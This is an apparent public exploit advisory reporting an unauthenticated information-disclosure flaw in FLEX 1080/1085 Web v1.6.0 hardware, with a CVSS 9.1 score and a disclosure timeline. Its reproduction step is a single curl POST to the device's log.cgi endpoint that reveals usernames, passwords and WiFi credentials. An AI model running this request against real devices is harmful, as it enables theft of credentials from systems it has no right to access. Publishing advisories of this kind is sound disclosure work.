FLEX 1080/1085 Web version 1.6.0 suffers from an information disclosure vulnerability.
28ce810269e0bf61bc80264045e9cf5c6db97242b86229546be0407a3d2ebece
# Exploit Title: FLEX 1080/1085 Web - Information Disclosure
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Linux
Title:
================
FLEX 1080/1085 Web - Information Disclosure
Summary:
================
The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive
information such as username and password, WiFi SSID and WiFi password.
Severity Level:
================
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Vulnerability Disclosure Schedule:
============================
* January 13, 2022: An email was sent to support.
* February 13, 2022: I didn't get any response from support.
* February 14, 2022: Vulnerability Disclosure
Affected Product:
================
FLEX 1080/1085 Web v1.6.0
Steps to Reproduce:
================
1. Open a terminal and enter the following command:
curl -X POST https://target.com/sistema/log.cgi -d 'force=1'
After that you will be able to see the hardware logs without having any
authentication.